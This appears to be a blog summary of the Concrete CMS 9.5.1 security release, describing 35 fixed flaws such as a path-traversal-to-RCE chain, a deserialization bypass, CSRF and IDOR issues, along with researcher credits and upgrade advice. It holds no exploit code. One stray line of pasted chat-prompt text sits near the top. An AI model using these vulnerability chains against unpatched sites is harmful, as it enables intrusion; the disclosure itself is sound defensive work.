Concrete CMS 9.5.1 Security Release: 35 Vulnerabilities Resolved

The release addresses vulnerabilities ranging from low-severity CSRF flaws to authenticated remote code execution vulnerabilities with CVSS v4 scores as high as 9.4. All users are strongly encouraged to upgrade immediately.

The official release notes are available from Concrete CMS 9.5.1 Release Notes.

Why This Release Matters

Banner hidden can you provide this exact document in plain html can you provide this exact document in plain html Gemini response

This release stands out not only because of the number of vulnerabilities resolved, but because several findings affected highly trusted administrative workflows inside the CMS.

The most significant issues involved:

• Authenticated remote code execution
• Package installation and upgrade security
• Missing authorization checks
• Insecure direct object references (IDOR)
• Stored and reflected cross-site scripting (XSS)
• Broad CSRF exposure across administrative endpoints

While many of the higher-severity vulnerabilities required elevated privileges, they still represent meaningful operational risk in real-world environments where:

• multiple administrators exist,
• third-party integrators have backend access,
• administrative sessions may become compromised,
• or staging and production permissions are loosely managed.

The release also highlights the importance of defense-in-depth within CMS ecosystems, particularly around package management, legacy controllers, and object-level authorization enforcement.

Critical Severity Vulnerability

Path Traversal to Remote Code Execution (CVSS 9.4 — Critical)

The most severe issue fixed in 9.5.1 involved insufficient sanitization of path traversal sequences in page type composer layouts.

An authenticated administrator with composer editing privileges could abuse template handling to include arbitrary readable files from the server. Combined with weak extension-based upload validation, this created a viable path to authenticated remote code execution.

The issue demonstrates a dangerous vulnerability chain involving:

1. arbitrary file inclusion,
2. upload abuse,
3. and execution of attacker-controlled code.

Although exploitation required privileged access, the impact potential justified the release’s only Critical severity rating.

This vulnerability was reported by Yonatan Drori (Tenzai).

High Severity Vulnerabilities

Insecure Deserialization in ExpressEntryList (CVSS 8.9 — High)

A high-severity deserialization flaw affected the ExpressEntryList block controller.

Researchers discovered that a protection mechanism intended to limit deserialization behavior could be bypassed through REST API request parsing behavior. Specifically, JSON parsing semantics allowed attackers to satisfy a strict Boolean condition unexpectedly.

A rogue administrator could inject a malicious serialized payload that executed when block data was later viewed or edited.

Although exploitation required elevated permissions, insecure deserialization vulnerabilities remain among the most dangerous classes of application flaws because they can lead directly to arbitrary code execution inside the PHP runtime.

This issue was reported by Nguyễn Văn Thiện.

Package Management and Update Workflow Vulnerabilities

Several additional High severity findings centered around package management and update operations.

Multiple endpoints responsible for:

• downloading marketplace packages,
• preparing package upgrades,
• installing packages,
• upgrading packages,
• and executing core CMS updates

were missing CSRF protections.

In isolation, CSRF vulnerabilities are often considered lower risk. However, when those vulnerabilities affect package installation and upgrade functionality, the potential impact increases substantially because those workflows interact directly with executable application code.

Under certain conditions, attackers could force authenticated administrators to trigger package operations or core update actions through crafted requests.

Affected workflows included:

• marketplace package downloads,
• remote package upgrades,
• package installation operations,
• package upgrade execution,
• and core CMS update handling.

These vulnerabilities were primarily reported by maru1009.

Privilege Escalation Through Bulk User Assignment

Another High severity issue involved missing authorization checks within bulk user assignment functionality.

Under certain permission configurations, authenticated users with access to the dashboard page could manipulate group membership assignments — including membership in administrative groups.

This created a potential privilege escalation pathway capable of granting elevated administrative access or removing legitimate administrators from privileged groups.

This issue was reported by Vincent55.

Stored Cross-Site Scripting Vulnerabilities

Several High severity XSS vulnerabilities were also resolved in this release.

These included:

• OAuth integration name injection,
• unsanitized height parameter handling,
• and administrative workflow rendering flaws.

While exploitation generally required authenticated backend access, stored XSS vulnerabilities inside CMS administrative environments remain particularly dangerous because they can enable:

• session theft,
• credential capture,
• administrative impersonation,
• and secondary compromise of connected systems.

These vulnerabilities were reported by:

• Yonatan Drori (Tenzai)
• and Alfin Joseph.

Authorization and Access Control Weaknesses

A major theme throughout the 9.5.1 release is improved enforcement of authorization boundaries.

Multiple vulnerabilities involved insecure direct object references (IDOR) or missing authorization checks affecting:

• conversations,
• file usage metadata,
• calendar events,
• Express form submissions,
• survey functionality,
• and restricted page metadata.

In some cases, unauthenticated attackers could enumerate or access:

• restricted conversation messages,
• file attachment information,
• internal site structure data,
• calendar event details,
• or unpublished content metadata.

Several of these findings demonstrate how small authorization gaps across legacy or auxiliary endpoints can accumulate into meaningful information disclosure risks.

Researchers credited with these findings include:

• Winston Crooker
• Tristan Madani
• Eldudareeno
• Youssef Eid
• Zer0daySec
• and lalalala5678.

Administrative CSRF Hardening

Concrete CMS 9.5.1 also resolves a large cluster of lower-severity CSRF vulnerabilities affecting backend administrative controllers.

The affected endpoints included operations such as:

• log deletion,
• bulk page actions,
• file rescans,
• event duplication,
• Express association reordering,
• file favoriting,
• and file version approval.

Individually, many of these vulnerabilities carried relatively low severity ratings. Collectively, however, they represent a broader hardening effort focused on legacy administrative functionality and state-changing operations.

This class of remediation work is often less visible than high-profile RCE fixes, but it plays an important role in improving long-term platform resilience.

Most of these CSRF findings were reported by Yonatan Drori (Tenzai), with additional contributions from Winston Crooker.

Additional Security Improvements

The release also addressed several other important security weaknesses, including:

• OAuth account status bypasses,
• unauthorized file access,
• reflected XSS in legacy pagination,
• SSRF exposure in the RSS Displayer block,
• file permission bypasses through conversation attachments,
• password change workflow weaknesses,
• and stored XSS through page naming and external link aliases.

While many of these vulnerabilities were lower severity individually, they collectively reduced attack surface across multiple subsystems within the CMS.

Researchers contributing to these findings included:

• 0x4c616e
• Tristan Madani
• Yonatan Drori (Tenzai)
• and others already credited throughout the release.

Operational Guidance for Administrators

Organizations running Concrete CMS should prioritize upgrading to version 9.5.1 as soon as operationally feasible.

Environments at elevated risk include those with:

• multiple backend administrators,
• marketplace connectivity enabled,
• delegated editorial workflows,
• third-party package usage,
• public-facing forms,
• or extensive custom integrations.

Recommended Actions

Administrators should consider the following actions alongside upgrading:

• Enforce MFA for all privileged accounts
• Review administrator and package installation permissions
• Audit marketplace-connected environments
• Reassess third-party package trust relationships
• Review Express entity and OAuth integrations
• Audit file access and storage configurations
• Restrict unnecessary administrative access paths

Sites storing sensitive or private files should also ensure protected files are stored outside the public web root so authorization checks are consistently enforced during file delivery.

Researcher Acknowledgements

Concrete CMS credited a broad group of independent security researchers who responsibly disclosed vulnerabilities through HackerOne.

Researchers credited in the 9.5.1 release include:

• Yonatan Drori (Tenzai)
• maru1009
• Winston Crooker
• Tristan Madani
• Nguyễn Văn Thiện
• Eldudareeno
• Vincent55
• Alfin Joseph
• Youssef Eid
• Zer0daySec
• lalalala5678
• 0x4c616e

The number and diversity of reports in this release reflect increasing scrutiny of the platform’s attack surface across package management, authorization boundaries, administrative workflows, legacy controllers, and file handling systems.

That level of external review is ultimately healthy for the long-term security maturity of the ecosystem.

Final Thoughts

Concrete CMS 9.5.1 is not a routine maintenance release.

It is a broad security hardening update that addresses weaknesses across:

• package management,
• authorization enforcement,
• file handling,
• authentication,
• administrative workflows,
• and legacy controller behavior.

Organizations running older versions should treat this as a high-priority upgrade cycle.

For mature CMS platforms, some of the most serious risks are not always unauthenticated attacks from anonymous users. Increasingly, the more dangerous vulnerabilities are those that allow trusted backend access to become privilege escalation, persistent compromise, or remote code execution.

This release meaningfully reduces that risk surface and represents an important security milestone for the platform.

Image source

Lewis, N. (n.d.). Indigo bunting [Photograph]. National Park Service. U.S. Fish & Wildlife Service. https://www.fws.gov/media/indigo-bunting-13